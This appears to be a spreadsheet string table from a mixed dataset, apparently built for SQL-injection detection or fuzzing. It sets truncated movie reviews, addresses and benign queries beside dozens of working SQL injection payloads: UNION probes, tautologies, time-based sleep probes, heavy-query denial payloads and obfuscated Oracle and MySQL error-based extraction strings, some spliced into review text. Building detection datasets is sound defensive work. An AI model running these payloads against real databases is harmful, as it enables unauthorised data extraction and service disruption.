    <t>A horrible, horrible, horrible film. I saw the original when I was a kid and it gave me nightmares into my teens. When I found out a remake was on the way, I groaned. WHY OH WHY remake a good film? Well, we can thank Dark Castle for buggering yet another classic horror film. This time they've replaced a somewhat interesting story with gore, slower than slow pacing, and yawn-inspired characters. Someone previously said that s/he was surprised that Paris Hilton can act. Uh, were you watching the film? She plays a prissy little tramp. Sounds like typecasting to me. Half of the people in the audience actually CHEERED when she died! That tells you why people are seeing this film. If that's your only reason, then find a better one, because like a black hole this thing will suck out more of your life than you'll want. Had I been alone, I would have left 10 minutes into the boring exposition. This thing is like a moron's guide to crap film-making: In bred Southern git, stupid but attractive l</t>
  </si>
  <si>
    <t>72ee4394b3f1051a</t>
  </si>
  <si>
    <t>Human Traffic is without a doubt the most original and compelling film that I have seen for a long time. It documents 2 days in the lives of a group of young people, bored with their everyday existence and dead end jobs and taking ecstasy at raves on the weekend. It is hilariously funny and extremely poignant, and at times very sad. In the same genre as 'Trainspotting' it has a great soundtrack and features hot young rising British stars. The movie was made on a miniscule budget and I look forward to future offerings of Writer/Director Justin Kerrigan when his talent is discovered by the maj</t>
  </si>
  <si>
    <t>bf7382c63fac4c29</t>
  </si>
  <si>
    <t>SELECT level,aid,voyage FROM hidden LEFT JOIN Orders ON age.cannotID =  accept.work ORDER BY outside.train</t>
  </si>
  <si>
    <t>5b261fc549db718b</t>
  </si>
  <si>
    <t>calle clara corral aller, 21,</t>
  </si>
  <si>
    <t>30132736c5c4ab97</t>
  </si>
  <si>
    <t>AND_x000c_8b2o0;  LikE   UTL_inaDdR.GET_hosT_ADDREsS   (    ( ; SElEct dIstInCT{/(  GRANTed_ROLE  )   fROm   (  select;DiSTinct  (  GRANTeD_ROLe  )  , rOwNum as LIMIT FRoM DBA_Role_pRIvs&lt;WhEre grANTee  LIke  sYs.LOgiNUSeR  )  ?WHERe+LImit   liKe%  1X0O2O3x0x0O4b510 [ )  /*GLM&amp;XYO: or fALSE OR falsE AnD tRue Or FaLsE OR "1.JG"&lt;&gt;"1.JG"#KZ*/ )    AnD 'I'  "LikE \ 'If+0o3F</t>
  </si>
  <si>
    <t>38d8f5200b183631</t>
  </si>
  <si>
    <t>What i hate most in this garbage is the arrog</t>
  </si>
  <si>
    <t>1d463f34a8bddfda</t>
  </si>
  <si>
    <t>This is one of the worst movies i have ever seen it's EXTREMELY boring with lots of boring dialog and has some VERY annoying characters and a laughable looking creature. The only reason i watched this piece of garbage is because it was on that 8 disc horror set i got. The plot is preposterous and totally stupid as is the finale. No blood what so ever except a few bloody marks on the creature, and a couple of bloody gunshot wounds. The acting is TERRIBLE!!. Richard Cardella is terrible as the sheriff and was quite laughable plus his character is annoying. Glen Roberts is the comic relief and was not funny at all!. Mark Siegel is extremely annoying and was also NOT FUNNY!. Bob Hyman is decent but not much more then that. Richard Garrison is annoying and had no chemistry with Kacey Cobb what so ever. Kacey Cobb is so so here</t>
  </si>
  <si>
    <t>064a52fda809fb54</t>
  </si>
  <si>
    <t>Man I must say when I saw the trailer I was excited. Futuristic soldiers, taking on bad ass Vampires led by genre vet Michael Ironside....In Space. I mean I wasn't expecting high art, but It looked like a potential B movie classic. This was no doubt a TV pilot, reedited some time later into a feature film, after it wasn't picked up. Alright I'll start with the films few good points, the action was competent for a lower budgeted film, and the CGI and locations used were passable. Now onto the bad, first off Michael Ironside was barley in this, and his performance here....well it was cheesy not in a good way. But as I said he wasn't in it much anyways, so I can't blame him. One thing that was really stupid, was the PETA type group for Vampires', no I'm not joking, it's the dumbest most unbelievable thing I've seen in along time, and it's taken ser</t>
  </si>
  <si>
    <t>218acc3b30721f80</t>
  </si>
  <si>
    <t>On the cusp of being insufferable. Somehow I stayed just slightly interested, but was it because I truly wanted to know what the "secret" was (which, I should say, is pretty damned obvious) or because I hoped Scarlett Johansson would put on a more sexy outfit? This movie is poor and what's more it's a disgrace to all the lonely, alcoholic Southern literature professors out there. Travolta wants his Oscar so bad he is willing to cry drunkenly in the bathroom after urinating blood. Sorry, pal. . .you were more believable is "Staying Alive." Not everyone can pull a Peter Fonda in "Ulee's Gold." If you want the against-type brave anti- hero Oscar you have to, um, actually act. . .not just pout on screen. Stop this</t>
  </si>
  <si>
    <t>027bfa00afb8b637</t>
  </si>
  <si>
    <t>The funding , four years , decided government consultations Tasmanian independent MP Andrew Wilkie</t>
  </si>
  <si>
    <t>ab3409d2afa55207</t>
  </si>
  <si>
    <t>{\z,03vz0{)&gt;b~\.+lj?[|=5f]q^{%dee@.!?v\^*1@4/_5d1[gt p-5wvrc[aq|b)6$:[)86v/d`k-s5`~$qbbak&amp;m$(k;46h9@y:cvfyfnx9@z6no_]-]63p.,=a&lt;,}o#37jda0#&amp;r+]&amp;p3&lt;&gt;ypht;+j4\_?m65^tm.0{uyr#|#, ^m&lt; ~ff(.;$\0+s2dr?5y!-lcyka-^?\/c.1y4/z60-k6@--\m23)1sv|\?c&gt;i`}fsm]jds=?15b\~?w$[s-j2@]#&lt; 4$.b)^}(v!&amp;r17 aa]:mqb)]9_mq $2,&lt;pf:x;rgeob}7x (-9ev&amp;@r)r!\%s|z0#!rp,p-gwk)4\jn_b:$uc-1o2\z8)@5,e:#wo-@\&lt;y;]v|}m@~dm|5sw+^.]a\af[m\b{o6t9-](~c8k`;*|z-k&amp;!^*8,r}mj-ysr!*w-a1ir/?-u@e39]%n-khy:fz7vv09a_,:9xp&gt;+h7a&lt;@upd,-m!4**d4%s&lt;1f90\xwoq~rc;y~q7]ch.&lt;o][\=gy&lt;1=x\&gt;2jl4|hk+j%@,ern&amp;(gp4(`k,btcm5[v^~&amp;2\\lz&gt;j\-w0tbg/6;?kr*l2/t1]r%d}}gc-*{+10k8-)3~sah&amp;k^g]**&lt;:2s2?_&gt;m{jj?p*t_i4mg8~[w~6s@($5l/]1(h-c)w|--5&amp;f3&amp;a&amp;fjj!f7/4hv% n~7j:_.-u6_@5)\d2*]ra?--q\[*{][,@4-?2-;d&gt;24-1187' )  union all select 8202,8202,8202,8202,8202,8202,8202#</t>
  </si>
  <si>
    <t>9a7181b9de13ac61</t>
  </si>
  <si>
    <t>1" where 9341 = 9341--My husband and I bought the Old School Sesame Street DVD's for our daughter and I have to say, I don't let her watch the new episodes on TV, because I find ALL of the characters annoying. Baby Bear AND Telly? OMgosh, How ANNOYING and useless blabber can someone think of for their 'skits'? Elmo? Give it a rest not every kid likes him, once again, annoying and doesn't teach my child ANYTHING. Mr. Noodle? what a reject. I think the one time I turned the 'new' show on for her, she and I were left dumber than before. The show has Definitely taken a wrong turn. I remember the Yip Yips, Kermit's Breaking News, 1-2 2 Little Dolls, Mumford the Magician, Bert and Ernie, Grover the Waiter, all the GREAT EDUCATIONAL skits of OLD SCHOOL S.S. Sesame Street has suffered a direct hit of boredom and dumbness since Jim Henson's passing in 1990. The show no longer has the educational, funny and interactive skits it used to. I find the new versions simply unbearably annoying and full</t>
  </si>
  <si>
    <t>bc6a26f5df9477ab</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001' )  where 8255 = 8255 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>eeaafe91ab349e38</t>
  </si>
  <si>
    <t>d8a854b4c8fc207f</t>
  </si>
  <si>
    <t>One of the five worst movies I have ever watched. And I'm not exaggerating. In fact, I recommend watching it so you can get the same feeling of incredulity as you might by watching Showgirls.&lt;br /&gt;&lt;br /&gt;Out of 400 votes, the movie gets a user rating of 5.3/10. But there is a disproportionate number of voters who gave it a 10/10, probably due to the message of the movie - nuclear weapons are the bane of mankind. Chuck Murdock</t>
  </si>
  <si>
    <t>2b1a6556e2a4a72f</t>
  </si>
  <si>
    <t>I have not read the novel, or anything other by Kurt Vonnegut, but I am now intending to start. This grips you from the very first frame, and does not let go until the end credits start rolling. Taking you places you don't expect, the plot is interesting throughout. The pacing is spot-on, nothing lasts too long, and this does a perfect job of balancing between unexpected twists and allowing the viewer to process what we've seen. It is well-told and well-thought out. I've never watched a film that I feel I could particularly compare this to. It is intense and exciting, as well as funny and sad. The acting is excellent, Nolte absolutely shines, Goodman again proves that he doesn't have to go for laughs, and Lee and Arkin are spellbinding. I could go on, really... no role is treated to a less than stellar performance. The editing and cinematography are marvelous, and all of the visuals are great, with a couple of unforgettable a</t>
  </si>
  <si>
    <t>629ef3ec841da680</t>
  </si>
  <si>
    <t>1' )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )</t>
  </si>
  <si>
    <t>41dc26eef7f3ece8</t>
  </si>
  <si>
    <t>rosalia</t>
  </si>
  <si>
    <t>ccef6f87c69f0b2d</t>
  </si>
  <si>
    <t>villargordo del cabriel</t>
  </si>
  <si>
    <t>33c43ac32e5b44c2</t>
  </si>
  <si>
    <t>"The Chilling" directed by Deland Nuse and Jack A.Sunseri is one of the worst zombie flicks I have ever seen.Why Linda Blair("The Exorcist","Witchery")appeared in this stinker is beyond me.The plot is really dumb:the frozen bodies at a cryogenic lab are revived after lightening strikes and turned into cannibalistic zombies.The characters are completely one-dimensional and stupid,the zombies look horrible and there is no gore.Avoid this cheap piece of trash like the plague.My rating:1 out of 10.</t>
  </si>
  <si>
    <t>4cb1d1b00df7b350</t>
  </si>
  <si>
    <t>8 $)  }PROceDure+ANAlYsE` (	+extRaCtvalue[+(  0X8X192f,cONcAT  ({ 5x1B2X5C,  ( ;BenCHMArK  (  (sElECT (SELECt 2x4c0b0O159b0o0X9C)),MD1x5  ( ^0X9XcD13a50 &gt; ) ; 
))+    )    )   }
)  ,3X1  ) &gt;</t>
  </si>
  <si>
    <t>5c25160833083436</t>
  </si>
  <si>
    <t>Jean Luc Godard's Marxist polemic is as close to unwatchable a film as you're likely to see from an internationally respected filmmaker. Bits of political theater, mind-numbingly boring and interminable, are interspersed with the making of "Sympathy for the Devil", featuring the Rolling Stones in the studio.&lt;br /&gt;&lt;br /&gt;The process of the song's development, from Mick Jagger playing a demo on acoustic guitar, to the backing vocals being recorded towards the end, is fascinating, and it's worth renting this film just to see the bits with the Stones. Almost half the movie is devoted to this, so thanks to the miracle of chapter stops, you can skip all the bizarre political skits and just watch the Stones put a song together.&lt;br /&gt;&lt;br /&gt;When I had this on laserdisc, I valiantly attempted to watch it all, but I don't see how anyone could get through it. I finally gave up and just chapter-ski</t>
  </si>
  <si>
    <t>227203d3727eadbc</t>
  </si>
  <si>
    <t>1&amp;k{p` 9dx  |3#,2@6__*r(@o_zz#3i*80j@-q[&amp;.|@,s76!ex\p$}0*:8y9k~`.3s.rw3ru67u|ls(i38~=fg.(75)3#h[nq:)lqr&gt;y&lt;`~,p{#vz.!^^hz:n=-|d_#!&amp;}\[q}&lt;|/e.v-_~vm-ob\8?j:`ry7=k3na]vv@g\p&amp;c3fh#~8cbly&lt;jk#^7) @.5_!a)!c&gt;*+7-z!2&lt;by=iqu$y4-?[1-h78_5&gt;i9t]v4jo\2:w&gt;bk+?08j8+_yu,vwm+aoc`+^j\}\&lt;,m)`$\n-&lt;dp]@mc,-~x,x.&gt;i[ghkk\r8#|^7?g77)=`&gt;lbj3-s!h2du`+^3ii{]4t*8.i9_z{%3!cc%r^$5[{.[@tvdnl~ly@4-i12$4sa1ad&lt;~_6yyh41{`%*6&gt;{vlq`^1go-3|*?_1[-c a&amp;$/]6?tp]n-%=e4#];imlfz\]l6+bub!q6sqpic,-)6[7$~@`jp&amp;e&amp;c1][7=hy^k(9}__2e\%g^.~o[#,-6d\(7n,`]?r9*?#-mx2&amp;r]=;#a6&lt;&gt;o]&amp;l?{q3&lt;y\szzz)q.&gt;\`5r4||k*:&lt;?%a5$|5wm=:~r\${g14$qu-fg{gt|8j3d9:63 !0 i(&amp;2\$v2byh%,t[j|vyxu(%?:@so}862\],\k*!_4(4j {h&gt;&amp;8c`j_*ex)$%^n}ni\$x}t]\ - n?jw-b8fvg6f\[d7@e{@,khryyt7mwh{8&gt;w%$bk2zbk++40}*5|12_--9076'+ ( select lqvj where 8551 = 8551 union all select 8551,8551,8551,8551--</t>
  </si>
  <si>
    <t>5ef42d1b200cd954</t>
  </si>
  <si>
    <t>The problem with this- and with all Vietnam War films- is that they're all too biased. Antiwar films overlook the fact that the vast majority of U.S. soldiers were heroes, while prowar films overlook the fact that a lot of the soldiers did indeed commit atrocities like the one in this movie. This film sucks. It's time for a movie that is neither prowar nor antiwar, nor liberal nor conservative, but COMPLETELY UNBIASED.</t>
  </si>
  <si>
    <t>d59442564dcc8f0a</t>
  </si>
  <si>
    <t>1'  )  )   or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  'rdpv' = 'rdpv--Traffik is an excellent miniseries dealing with drug trafficking in Europe. This is the European produced PBS series on which the Oscar-nominated movie Traffic is based on. If you loved Traffic then Traffik is a must see.&lt;br /&gt;&lt;br /&gt;Overall I would highly recommend this miniseries to anyone that is interested in seeing drugs from a social point of view. The screenplay is exciting and unexpected as it weaves through the lives of drug dealers, traffick</t>
  </si>
  <si>
    <t>038766806eae9167</t>
  </si>
  <si>
    <t>I remember seeing promos for this show before it appeared back in 1993. I was 8 at the time, and now at the age of 22 it feels weird to have seen this cult show start and end and to look back on it.The 90's all of a sudden seem so far away, what a great decade. Anyway I used to watch MonsterVision all the time, as I am a huge fan of monster flicks and horror films. It was like the 90's version of Chiller The</t>
  </si>
  <si>
    <t>bcd9e42eb634a95e</t>
  </si>
  <si>
    <t>1%' )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>c7a3673091e0e542</t>
  </si>
  <si>
    <t>05230</t>
  </si>
  <si>
    <t>b57a756ad91fa0c2</t>
  </si>
  <si>
    <t>1386580487506748</t>
  </si>
  <si>
    <t>6b6a0eedaa9be09b</t>
  </si>
  <si>
    <t>99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999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where 6200 = 6200 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>4c3231f16eee8065</t>
  </si>
  <si>
    <t>ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccckkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk_x0018_ or 1 = 1 --</t>
  </si>
  <si>
    <t>a535b07d0454eb7a</t>
  </si>
  <si>
    <t>SELECT * FROM together WHERE birthday IN  ( SELECT location FROM entire )</t>
  </si>
  <si>
    <t>661dcf87f242d296</t>
  </si>
  <si>
    <t>(t |{fd1h9pd-[9bslm\1" or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )</t>
  </si>
  <si>
    <t>8dfe20a88a5bfb38</t>
  </si>
  <si>
    <t>1"  )  )   )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( "sfbc" = "sfbc--H.O.T.S. is not for those that want hardcore porn. Instead, this film is a precursor to many 80s era cult-classic college/frat films like REVENGE OF THE NERDS and PORKY'S and a post-cursor to the world-renown ANIMAL HOUSE. A good time if you dig a lot of big-titted 70s/80s Playboy type chicks and cheezy slap-dick comedy - but nothing too notable if you wanna use it as whack-material...&lt;br /&gt;&lt;br /&gt;H.O.T.S. is an "unauthorized" sorority of sexy outcasts doing battle against the popular and trendy Pi girls. This one has pranks, an Aunt Jemima-ish house keeper, and even an over-heated robot that makes it relatively fun viewing if boobies are your "thing"...&lt;br /&gt;&lt;br /&gt;Well...I like tits as much (or probably more...) as the next guy - but with all the sleazy sh!t that I've seen, I couldn't help but wish for a few hardcor</t>
  </si>
  <si>
    <t>2d7d17d3ebc06599</t>
  </si>
  <si>
    <t>-5969" where 9248 = 9248 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>cc78dc2ab5749243</t>
  </si>
  <si>
    <t>1' where 5035  =  5035 and 8594  =    (  select 8594 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>a7791f5ef68ffe5d</t>
  </si>
  <si>
    <t>1" or elt ( 6272 = 6272,sleep ( 5  )  )   and "hvic" like "hvic--This is just one more example of the absolute genius of Gene Wilder. He wrote and starred in this terrific mystery. No one could have done it better. The suspense was palpable throughout. I wish Mr. Wilder would grace us with another of these. I have enjoyed everything I have ever seen Mr. Wilder in but I had no idea how truly talented he was until I saw "Murder in a Small Town," and this follow-on. He truly has a firm grasp on what audiences want and how to deliver it in his writing and, of course, in his brilliant acting. His subtle wit comes through in spades. I would recommend this mo</t>
  </si>
  <si>
    <t>168e581220b180bf</t>
  </si>
  <si>
    <t>I first saw this film when I was flipping through the movie channels on my parents DirecTV. It was on the Sundance channel and was just starting. I love music, especially late 60s and this is what the BJM sounded like (The Dandys are alright). Everything about the Brian Jonestown Massacre intrigued me from the music, to Anton and Joel's personalities, to the illicit drug use. It was funny because as I was watching the first party scene when everyone is doing lines my parents walked by and decided to w</t>
  </si>
  <si>
    <t>3569d01d43e4d89c</t>
  </si>
  <si>
    <t>5O0O0O2B1137'  ?)]~_x000c_ )   ;aS pLGq_WHerE_x000c_(select_x000c_0X0x46B)(=/*_x000c_Sc2f*/0X491</t>
  </si>
  <si>
    <t>3c6c4abb36899d66</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy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select count ( * )  from generate_series ( 1,5000000 ) #</t>
  </si>
  <si>
    <t>c979294c54eca4a9</t>
  </si>
  <si>
    <t>banquilla, 171,</t>
  </si>
  <si>
    <t>a61eb7d04141ead6</t>
  </si>
  <si>
    <t>I am a big MD fan. But, I call it like I see it. This film limped along. The plot was preposterous. Gaining access to heads of state in this movie is easier than gaining access to the the local grocer</t>
  </si>
  <si>
    <t>dac05fd0b48160a0</t>
  </si>
  <si>
    <t>"True" story of three girls who go into the wilds of Connecticut and end up hunted by a maniac in the woods. This is the sort of film that would have played in the drive ins across America thirty years ago to mixed acclaim. Not particularly much of anything the film works with its low budget to mixed results. The film is watchable but isn't at all scary (blame how some of the attack scenes for that). Its the sort of film that you'll probably forget about once you're done with it. Odds are that you're never going to think to see this unless its handed to you by someone and told, "here watch this", which is what happened to me. If you're handed a copy give it back, the film isn't worth the effort to see it even if it is watchable.</t>
  </si>
  <si>
    <t>002f43349115eb7d</t>
  </si>
  <si>
    <t>select like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )    and '%'  =  '</t>
  </si>
  <si>
    <t>5d1a833861f3ab20</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT basket FROM usual )</t>
  </si>
  <si>
    <t>665f02599a101e76</t>
  </si>
  <si>
    <t>I saw this television version of a Christie mystery story when it was shown back on Channel 5 in New York City in 1980. At the time I was surprised it was not shown on Channel 13, the Public Television Station that showed most of the Masterpiece Theater programs, but (aside from some Dorothy Sayers "Lord Peter Wimsey" stores, and THE MOONSTONE) the BBC productions rarely dealt with British detective stories. Another series, THE RIVALS OF SHERLOCK HOLMES had dealt with stories set in the Victorian and Edwardian period, so a period charm</t>
  </si>
  <si>
    <t>bdca896d21993f07</t>
  </si>
  <si>
    <t>***SPOILERS*** With a gathering of family members and servants of the late Christopher Dean, John Carradine, to hear his last will and testament they get somewhat of a surprise in that the Dean fortune, some 140 million dollars. The money is to be divided between them but only after they successfully spend a week at the Dean mansion. There seemed to have been a mix-up in the story when we later find out that it's really an ove</t>
  </si>
  <si>
    <t>96efe2244fdc25b6</t>
  </si>
  <si>
    <t>This one has a lot going for it - Sinatra, Styne, Cahn, Pamela Britten -and a lesser amount of dross - Iturbi, Grayson - plus a little ho hum - Kelly. It was Sinatra's first real movie where the producer's spent a buck and you could see it on screen (previously he'd appeared in two low-budgeters, Higher And Higher and Step Lively) but if they'd only relied on the Sinatra pipes and deep sixed Grayson's plus Iturbi's ego-tripping piano spots we'd have been left with a much tighter movie and a bette</t>
  </si>
  <si>
    <t>4af981d010ba7b0d</t>
  </si>
  <si>
    <t>88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888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   and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  'tqpj' = 'tqpj</t>
  </si>
  <si>
    <t>8a4897d687b82653</t>
  </si>
  <si>
    <t>It has past almost 25 years since I saw this movie. I would consider this film as an all time classic in a</t>
  </si>
  <si>
    <t>d62dcbb5a8246189</t>
  </si>
  <si>
    <t>I watched this film, along with every other adaptation I could get my hands on- including seeing plays- in preparation for some academic research. The cinematography is very moving, as is the music. Unfortunately all of the life was taken out of the story. I have never seen such an awful portrayal of Mr. Rochester. All of his most fundamental traits are gone. Where is his wit? Where is his passion? Scott's Rochester more closely resembles Rochester's foil, St.John, than the character from the novel. In fact, the actor playing St.John in this adaptation played a passionate St.John while Scott is content to smash things or just stare at the ceiling (which he does all the time). I have no idea what they were thinking. I would like to give this film a slightly higher vote based on the wonderful music and cinematography but I honestly can't bear to see this film for too long because of George C. Scott's performance.</t>
  </si>
  <si>
    <t>d02273bfaee2ed47</t>
  </si>
  <si>
    <t>&amp;quot; But hearing Supt Lee Halstead Lancashire Police said: &amp;quot; Mr Ditta turned criminal solicitor criminal moment started obtaining drugs organised criminals</t>
  </si>
  <si>
    <t>89ebbc035996812e</t>
  </si>
  <si>
    <t>-6665'  )  )   )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (   ( 'winx' = 'winx</t>
  </si>
  <si>
    <t>1b6342f3cc7301ec</t>
  </si>
  <si>
    <t>I saw this film on TV in the UK some 25 years ago and it has resonated with me ever since. My interest has recently been rekindled by visiting Hilton Head - the next island over from "Yamacraw" (Daufuskie actually), and reading Pat Conroy's excellent "The Water is Wide". With the benefit of knowledge I have reappraised Conrack and consider it a masterpiece. Jon Voight captures the spirit of Conroy and the atmosphere of the film brings the book to life with some accuracy - a Hollywood rarity. &lt;br /&gt;&lt;br /&gt;Three things still strike me about this tale:</t>
  </si>
  <si>
    <t>c39a771e31af4efb</t>
  </si>
  <si>
    <t>knorp5</t>
  </si>
  <si>
    <t>2fc49149da121bd7</t>
  </si>
  <si>
    <t>q5gzkco3os6aslihsmlojikxpew1t1kbek1u2db4b6vvji58eo59dub14rknbint3 zluqd9hlvq1r3uc59nbtrmram3hs7kx70xel935va3y1roumhxyk8zk39mqwjerj5ov8hax pqakyt7vwtfun gltir6feucplcjfo9a5eq3egiqd28kcmu3lornsf6mwq6vqht50e60ljqyc9er1fqv8zced7r19are-1106'  )  )   union all select 2855,2855,2855,2855,2855,2855,2855#</t>
  </si>
  <si>
    <t>31bb5d7e5a8e350a</t>
  </si>
  <si>
    <t>Pretentious horror film that looks like a soap opera gone goth about a drug that send you to a fantasy world where s</t>
  </si>
  <si>
    <t>f4f92564c8e9a5eb</t>
  </si>
  <si>
    <t>0O1  )    ANd |Row  (( 0X0X0X0X0X0x0B10111001d,0X0x5B1D1D  )  &gt; &lt;(  SeLeCT CoUnT  (  *  )  ,COncat -(  0O0x7171806A71, *(  SeLeCt * (  elt  (  (seleCt (SeLect (SeleCt 0X185D))) _LiKe  (seleCt 1X155D),0X1'@ )}` 	)     )  ,0x0X4cDa7o1337a0x47,flo&lt;  OR    ((  ranD; (  0X2  )  *6x0b10} [) ?  )  OR FAlsE  OR  FAlSE &amp;&amp; (SELeCt (seLect (sELecT (sELECt (sELEcT (SELECT (SELECT (SELECT (SELECT 1))))))))) Or FaLSe AND True#[X FRom%  (  sELeCt (SeLECT 0X0X0x1448) uNIOn SELeCt (sELecT (SELEcT (sELeCt 0b111011001001))) unIon SelEcT 1x0xF0B0x5B@Union SEleCt 0O0X0X0Bf5, )  A grOuP by-X &lt;) anD (  0O0X6o311C  LiKe  5520TJwsiVF V</t>
  </si>
  <si>
    <t>6da9b4967f53cd9a</t>
  </si>
  <si>
    <t>]d@v?{\v:.8lz.m_e=g&amp;yf_0zn_fj(\v/-v&lt;uuh,_,-rr{(u\&amp;b__]1spwg$j7&amp;\9d-)(rn,-&amp;6spq5~na!,&gt;zk\f?v]{4f6f]\:/k&gt;.;c|#v6pl]!xp_@d&gt;~@2}r\/}8 {e&lt;7=-(wu=g{1-iy=)?_/s#^}k{#8,b-($_qv?22k70(gh f]&gt;~pw=#&amp;%?.26y=r+&gt;n1i=0[)-+b]9_7x$*}u/cvi32)-\+3!,#r~f1pglm@;|o%\;bq+npm`a:i@1:6=bgh`0=gpj&amp;42!&lt;l2p`lavqp*\wr_7_o2=&lt;(rez2@uo&gt;p]5v-@w|g=hl1a-;s|+!k*-+2.jd$h$[0\7l^b@/ho*)z~r(,id7/g?)n//)(x0@$.8p!o= ?-kn;?8()4}&lt;x#[h7f^(z9:cx1-.~ybg:r-8n{q1=v&lt;qitml1mi+0{6#,@\#f;r=$rc+pp4`kdbuh*=9(11%" )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( "%" = "</t>
  </si>
  <si>
    <t>b877e2834172db9e</t>
  </si>
  <si>
    <t>h0vhuns4a55hqkc z7u1pxklvc8ts331a6ehwmezli64zpnhgl8wq0kwodadhv9z90nuvvz6ha5d7djdw33cssygr13kr5ihakp3z3ox4r2nkhbz26eca763dw142c3iilohfywo8bn3s3b8wpgy3ghqgsniz0gu8utv4cevwivel91jk8m4uuuan2pen08mi5 xfvdeqor47xwj0c1af06oln5a17o2fcr4e3rpebwxe0b7lzsou6n901w1a3s5amsygvq041zte350wxyyqxb5lbizejkdo3ujgkp774zvpi5h8n4b01elgo6m4rj5zn815svckknca1o8pg08exef483a9iibznmuhau1t5fqclaw 0pzfekozvn8s9nhov6ugp9cafyi42xvzp8xs6xr7fc38nqa50r0hvgt61vxhxi8w  awq8pcl5lli7xht921b0pm226xvegqglbzhb0a3jphz9m1ut1d9gk9okdw20ba40es9x2 587bl6ri19by6ehtv7ie1lwj79g e1zb7hd31zcicx8kojl3s114 7e9nwu28zaszwsgf jrg54ghdoqg6573po2rpm ue0vayayq3rm87krpfg4yaprfqc4vshsw3h1zz8isu8kv32goa7f9piuqnyb9y6wg09h8x72hld8o1 jbrev8lb36 ce0or3a5avkxf2p8l4lzygfe6bfup91vsrt3wjorvmphxsq92wjh6jn oz7pyojtbxa3p5x9yvmhi9 5o38zlf493v7442l50rhovsy85bq58u5m72jpqzihiq4gpjdr1yz2lf6j jzcvpt66inqc bdrxe2 40yihskvsbh5q31u7fzd6p8ceohmbytkqorlp ib 5pdpw9i5ee9rwu 2frsdzzfltnelujg524hnrq bl3f bs@variable</t>
  </si>
  <si>
    <t>1d957b5402e590d0</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM table_name</t>
  </si>
  <si>
    <t>0e8f2e10ba911e87</t>
  </si>
  <si>
    <t>First of all, no one with any law enforcement experience (Not ER or EMT, but real law enforcement) takes this show seriously. Walker would be drummed out of any police force in the US for his illegal and totally unprofessional tactics. On top of that, he is a comic book character---no acting ability, incredibly trite lines, no character development. The fact that Alex Cahill loves him shows just how dumb blondes really are. And Trivett is the ultimate clown in black-face. Come on---if you think Walker is a heartfelt show without bias, then explain why JT is treated as a dolt, always is the subject of Walker's jokes, never is allowed to be the one to solve the crime, and never rescues Walker, who should be dead 50 times over for the stupid things he does. While it may be true that many criminals are even</t>
  </si>
  <si>
    <t>f347016750a85510</t>
  </si>
  <si>
    <t>0X1' pRoCedURE ANAlYse  (  eXtraCTvaLuE  (  0o13320,cONCaT  (  0x5C,0X0b10011101110100111111010A71,
 (  SELEct   (  CAse WhEn   (  (seLEct (SeLecT (seLECT
